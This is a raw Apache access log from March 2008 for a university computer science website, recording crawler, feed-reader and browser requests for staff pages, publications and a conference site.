58.186.47.108 - - [23/Mar/2008:03:16:22 +0000] "GET /staff/nick/home/research/ae/ HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.120.116.178 - - [23/Mar/2008:03:17:21 +0000] "GET /UserFiles/Image/header.gif HTTP/1.1" 200 11718 "-" "Mozilla/4.0 (compatible;)"
65.214.44.29 - - [23/Mar/2008:03:17:21 +0000] "GET /Staff/cormac/rss.xml HTTP/1.1" 304 - "-" "Bloglines/3.1 (http://www.bloglines.com; 2 subscribers)"
74.6.18.117 - - [23/Mar/2008:03:18:33 +0000] "GET /index.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
60.229.21.27 - - [23/Mar/2008:03:19:23 +0000] "GET /staff/jcarthy/home//alp/alp2-3.html HTTP/1.1" 200 43103 "-" "Opera/9.26 (Windows NT 5.1; U; en)"
60.229.21.27 - - [23/Mar/2008:03:19:26 +0000] "GET /favicon.ico HTTP/1.1" 404 289 "http://www.cs.ucd.ie/staff/jcarthy/home//alp/alp2-3.html";; "Opera/9.26 (Windows NT 5.1; U; en)"
12.111.95.65 - - [23/Mar/2008:03:19:44 +0000] "GET /UserFiles/Image/sdobson.jpg HTTP/1.1" 200 2413 "-" "-"
193.1.132.49 - - [23/Mar/2008:03:20:02 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
74.6.30.176 - - [23/Mar/2008:03:21:16 +0000] "GET /robots.txt HTTP/1.0" 404 289 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
74.6.7.160 - - [23/Mar/2008:03:21:25 +0000] "GET /UserFiles/publications/1158831157499.pdf HTTP/1.0" 200 31380 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
24.232.166.35 - - [23/Mar/2008:03:23:45 +0000] "GET /staff/nick/research/ae/ HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
193.1.172.46 - - [23/Mar/2008:03:24:29 +0000] "GET /robots.txt HTTP/1.0" 404 288 "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
193.1.172.46 - - [23/Mar/2008:03:24:29 +0000] "GET /csprism/resources/Switching_Pres.ppt HTTP/1.0" 304 - "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
193.1.172.46 - - [23/Mar/2008:03:24:34 +0000] "GET /csprism/resources/AFME.ppt HTTP/1.0" 304 - "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
193.1.172.46 - - [23/Mar/2008:03:24:48 +0000] "GET /staff/aquigley/home/index.php?Personal:1973-95%3A_Ireland HTTP/1.0" 200 11970 "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
193.1.132.49 - - [23/Mar/2008:03:25:01 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
165.21.155.8 - - [23/Mar/2008:03:26:53 +0000] "GET /staff/jcarthy/home/Image2.gif HTTP/1.1" 200 6573 "http://images.google.com.sg/imgres?imgurl=http://www.cs.ucd.ie/staff/jcarthy/home/Image2.gif&imgrefurl=http://www.cs.ucd.ie/staff/jcarthy/home/Comsys_notes.html&h=357&w=413&sz=7&tbnid=bL_5L2tTIEffhM:&tbnh=108&tbnw=125&hl=en&prev=/images%3Fq%3Dcomputer%2Bsystem%26gbv%3D2%26hl%3Den%26sa%3DG&frame=small";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
165.21.154.103 - - [23/Mar/2008:03:26:54 +0000] "GET /favicon.ico HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
165.21.154.93 - - [23/Mar/2008:03:27:19 +0000] "GET /staff/jcarthy/home/Comsys_notes.html HTTP/1.1" 200 102430 "http://images.google.com.sg/imgres?imgurl=http://www.cs.ucd.ie/staff/jcarthy/home/Image2.gif&imgrefurl=http://www.cs.ucd.ie/staff/jcarthy/home/Comsys_notes.html&h=357&w=413&sz=7&hl=en&start=10&tbnid=bL_5L2tTIEffhM:&tbnh=108&tbnw=125&prev=/images%3Fq%3Dcomputer%2Bsystem%26gbv%3D2%26hl%3Den%26sa%3DG";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
65.55.208.48 - - [23/Mar/2008:03:27:29 +0000] "GET /staff/aquigley/home/index.php?Personal:2005-%3A_Ireland&login HTTP/1.1" 401 12182 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
74.6.29.252 - - [23/Mar/2008:03:28:49 +0000] "GET /staff/aquigley/home/?Links:HCI_-_CHI HTTP/1.0" 200 13136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
82.170.39.24 - - [23/Mar/2008:03:29:19 +0000] "GET /Staff/pcunningham/#2002 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:20 +0000] "GET /Staff/pcunningham/#2003 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:24 +0000] "GET /Staff/pcunningham/#2004 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:24 +0000] "GET /Staff/pcunningham/#2001 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:24 +0000] "GET /Staff/pcunningham/#2000 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:25 +0000] "GET /Staff/pcunningham/#1999 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:25 +0000] "GET /Staff/pcunningham/#2005 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:25 +0000] "GET /Staff/pcunningham/#1998 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:26 +0000] "GET /Staff/pcunningham/#1997 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:26 +0000] "GET /Staff/pcunningham/#1996 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:34 +0000] "GET /Staff/pcunningham/#1995 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
65.55.208.48 - - [23/Mar/2008:03:29:36 +0000] "GET /staff/aquigley/home/?Personal:2005-%3A_Ireland&login HTTP/1.1" 401 12047 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
82.170.39.24 - - [23/Mar/2008:03:29:36 +0000] "GET /Staff/pcunningham/#1994 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:37 +0000] "GET /Staff/pcunningham/#1993 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:38 +0000] "GET /Staff/AcademicStaff/pcunningham/ HTTP/1.1" 200 20057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:29:40 +0000] "GET /Staff/pcunningham/#1992 HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
89.100.102.201 - - [23/Mar/2008:03:30:01 +0000] "GET /Staff/AcademicStaff/jmurphy HTTP/1.1" 301 337 "http://search.live.com/spresults.aspx?q=john+murphy+it+ireland&form=QBPR";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:01 +0000] "GET /Staff/AcademicStaff/jmurphy/ HTTP/1.1" 200 36508 "http://search.live.com/spresults.aspx?q=john+murphy+it+ireland&form=QBPR";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:02 +0000] "GET /styles/ucd.css HTTP/1.1" 200 10944 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
193.1.132.49 - - [23/Mar/2008:03:30:02 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
89.100.102.201 - - [23/Mar/2008:03:30:02 +0000] "GET /SortList.js HTTP/1.1" 200 2856 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:02 +0000] "GET /javascript/email.js HTTP/1.1" 200 359 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:02 +0000] "GET /UserFiles/Image/ucd_submit.gif HTTP/1.1" 200 197 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:02 +0000] "GET /UserFiles/Image/logo.gif HTTP/1.1" 200 3085 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:03 +0000] "GET /UserFiles/Image/jmurphy.jpg HTTP/1.1" 200 2181 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:03 +0000] "GET /UserFiles/Image/header.gif HTTP/1.1" 200 11718 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
82.170.39.24 - - [23/Mar/2008:03:29:58 +0000] "GET /Staff/AcademicStaff/pcunningham/ HTTP/1.1" 200 20057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
89.100.102.201 - - [23/Mar/2008:03:30:03 +0000] "GET /UserFiles/Image/background_2_columns_left.gif HTTP/1.1" 200 67 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:03 +0000] "GET /UserFiles/Image/bullet.gif HTTP/1.1" 200 61 "http://www.cs.ucd.ie/Staff/AcademicStaff/jmurphy/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"
89.100.102.201 - - [23/Mar/2008:03:30:03 +0000] "GET /favicon.ico HTTP/1.1" 404 289 "-" "Mozilla/5.0 (compatible; Google Desktop)"
67.195.44.110 - - [23/Mar/2008:03:30:22 +0000] "GET /robots.txt HTTP/1.0" 200 1681 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
74.6.30.121 - - [23/Mar/2008:03:30:22 +0000] "GET /rss.xml HTTP/1.0" 200 2926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
74.6.27.95 - - [23/Mar/2008:03:30:23 +0000] "GET /UserFiles/publications/1146563905741.pdf HTTP/1.0" 200 457979 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
72.14.199.38 - - [23/Mar/2008:03:31:02 +0000] "GET /Staff/cormac/rss.xml HTTP/1.1" 304 - "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=18330990863338158850)"
82.170.39.24 - - [23/Mar/2008:03:31:03 +0000] "GET /CampusCompanies.html HTTP/1.1" 200 6660 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:03 +0000] "GET /ContactUs.html HTTP/1.1" 200 3421 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:06 +0000] "GET / HTTP/1.1" 200 6631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:07 +0000] "GET /AboutUs.html HTTP/1.1" 200 3687 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:07 +0000] "GET /index.html HTTP/1.1" 200 6631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:08 +0000] "GET /Staff/pcunningham/COMP50030/index.html HTTP/1.1" 200 3207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:06 +0000] "GET /Staff/AcademicStaff/pcunningham/430ML/index.html HTTP/1.1" 200 16938 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:08 +0000] "GET /News/index.html HTTP/1.1" 200 9268 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:08 +0000] "GET /Staff/index.html HTTP/1.1" 200 3633 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:09 +0000] "GET /Staff/pcunningham/UCD-TRs.html HTTP/1.1" 200 2795 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:10 +0000] "GET /Research/index.html HTTP/1.1" 200 9339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:11 +0000] "GET /Postgraduates/index.html HTTP/1.1" 200 4741 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:12 +0000] "GET /Undergraduates/index.html HTTP/1.1" 200 7737 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:17 +0000] "GET /LocalInformation/index.html HTTP/1.1" 200 3342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.170.39.24 - - [23/Mar/2008:03:31:18 +0000] "GET /Staff/AcademicStaff/pcunningham/# HTTP/1.1" 200 20057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
65.55.208.44 - - [23/Mar/2008:03:32:41 +0000] "GET /staff/aquigley/home/?Research HTTP/1.1" 200 14084 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
74.6.7.90 - - [23/Mar/2008:03:33:37 +0000] "GET /ideasDay/projects05/EAbrahamson/ HTTP/1.0" 404 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
193.1.132.49 - - [23/Mar/2008:03:35:01 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
129.42.184.35 - - [23/Mar/2008:03:36:49 +0000] "HEAD /Staff/AcademicStaff/jberndsen HTTP/1.1" 301 - "-" "Jakarta Commons-HttpClient/3.0-rc4"
129.42.184.35 - - [23/Mar/2008:03:36:49 +0000] "HEAD /Staff/AcademicStaff/jberndsen/ HTTP/1.1" 200 - "-" "Jakarta Commons-HttpClient/3.0-rc4"
74.6.24.169 - - [23/Mar/2008:03:36:56 +0000] "GET /UserFiles/publications/1145276884135.pdf HTTP/1.0" 200 84018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
65.55.208.50 - - [23/Mar/2008:03:38:55 +0000] "GET /Staff/AcademicStaff/jcarthy HTTP/1.1" 301 337 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
218.28.88.99 - - [23/Mar/2008:03:39:47 +0000] "GET /aic HTTP/1.1" 404 281 "-" "Mozilla/3.0 (compatible; Indy Library)"
218.28.88.99 - - [23/Mar/2008:03:39:49 +0000] "GET /aic HTTP/1.1" 404 281 "-" "Mozilla/3.0 (compatible; Indy Library)"
193.1.132.49 - - [23/Mar/2008:03:40:02 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
124.43.101.36 - - [23/Mar/2008:03:31:00 +0000] "GET /staff/jcarthy/home/2ndYearUnix/Textbookintro.pdf HTTP/1.1" 200 337168 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
193.1.172.46 - - [23/Mar/2008:03:41:12 +0000] "GET /staff/aquigley/home/index.php?Research:Projects:Complete&print HTTP/1.0" 200 18050 "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
59.97.0.108 - - [23/Mar/2008:03:41:40 +0000] "GET /Staff/jmurphy/publications/181.pdf HTTP/1.1" 200 136994 "http://www.google.co.in/search?q=congestion+control+%26+leaky+bucket+mechanism&hl=en&start=40&sa=N";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.6.25.233 - - [23/Mar/2008:03:42:10 +0000] "GET /Postgraduates/PostgraduateStudents/mjanota.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
74.6.9.160 - - [23/Mar/2008:03:42:22 +0000] "GET /staff/aquigley/home/?Research:Professional_Activities:Ongoing HTTP/1.0" 200 17953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
171.64.75.105 - - [23/Mar/2008:03:43:12 +0000] "GET /robots.txt HTTP/1.0" 404 288 "-" "Heymann/Nutch-0.9 (Nutch; http://i.stanford.edu/ ; nutchcrawl@heymann.be)"
171.64.75.105 - - [23/Mar/2008:03:43:16 +0000] "GET /Staff/franz/cs30010.htm HTTP/1.0" 200 1618 "-" "Heymann/Nutch-0.9 (Nutch; http://i.stanford.edu/ ; nutchcrawl@heymann.be)"
65.55.208.50 - - [23/Mar/2008:03:44:25 +0000] "GET /Staff/AcademicStaff/jcarthy/ HTTP/1.1" 200 17419 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
193.1.132.49 - - [23/Mar/2008:03:45:01 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
193.1.132.49 - - [23/Mar/2008:03:45:02 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
193.1.132.49 - - [23/Mar/2008:03:45:02 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
74.6.9.153 - - [23/Mar/2008:03:45:12 +0000] "GET /UserFiles/publications/1157122093957.pdf HTTP/1.0" 200 278034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
38.99.13.124 - - [23/Mar/2008:03:45:35 +0000] "GET /staff/nick/long.htm HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)";;
74.6.21.125 - - [23/Mar/2008:03:45:58 +0000] "GET /staff/Mkeane/home/lisp2.rtf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
65.219.4.5 - - [23/Mar/2008:03:47:36 +0000] "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
65.219.4.5 - - [23/Mar/2008:03:47:37 +0000] "GET /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
65.219.4.5 - - [23/Mar/2008:03:47:36 +0000] "GET /staff/lmurphy/home/mypubs/grainne_icete2005_sub.pdf HTTP/1.1" 200 107053 "http://www.google.com/search?source=ig&hl=en&rlz=&q=DSSS-OFDM";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
77.91.224.21 - - [23/Mar/2008:03:47:45 +0000] "GET /csimap.html HTTP/1.1" 200 2742 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
74.6.9.189 - - [23/Mar/2008:03:47:46 +0000] "GET /students/8/ HTTP/1.0" 200 24381 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
74.6.21.169 - - [23/Mar/2008:03:48:29 +0000] "GET /UserFiles/publications/1178897562811.pdf HTTP/1.0" 200 405898 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
58.207.172.167 - - [23/Mar/2008:03:49:35 +0000] "GET / HTTP/1.1" 200 5709 "http://grid.hust.edu.cn:8080/call/cfp.jsp";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:36 +0000] "GET /files/garland_logo.png HTTP/1.1" 200 8868 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:36 +0000] "GET /files/ucd2_.jpg HTTP/1.1" 200 12009 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:37 +0000] "GET /modules/book/book.css HTTP/1.1" 200 576 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:37 +0000] "GET /modules/node/node.css HTTP/1.1" 200 678 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:37 +0000] "GET /modules/system/defaults.css HTTP/1.1" 200 737 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:38 +0000] "GET /modules/system/system.css HTTP/1.1" 200 6932 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:37 +0000] "GET /files/ucd1_.jpg HTTP/1.1" 200 27589 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:39 +0000] "GET /themes/garland/style.css HTTP/1.1" 200 16815 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:39 +0000] "GET /files/dublin1_.jpg HTTP/1.1" 200 19580 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:40 +0000] "GET /modules/user/user.css HTTP/1.1" 200 858 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:40 +0000] "GET /files/color/garland-7f82145e/style.css HTTP/1.1" 200 16708 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:41 +0000] "GET /files/ucd.jpg HTTP/1.1" 200 2140 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:40 +0000] "GET /files/dublin2_.jpg HTTP/1.1" 200 27528 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:41 +0000] "GET /themes/garland/print.css HTTP/1.1" 200 1256 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:41 +0000] "GET /misc/feed.png HTTP/1.1" 200 764 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:42 +0000] "GET /files/microsoft.png HTTP/1.1" 200 7857 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:43 +0000] "GET /files/color/garland-7f82145e/bg-navigation.png HTTP/1.1" 200 98 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:42 +0000] "GET /files/SFI_logo.jpg HTTP/1.1" 200 70057 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:43 +0000] "GET /files/color/garland-7f82145e/body.png HTTP/1.1" 200 178 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
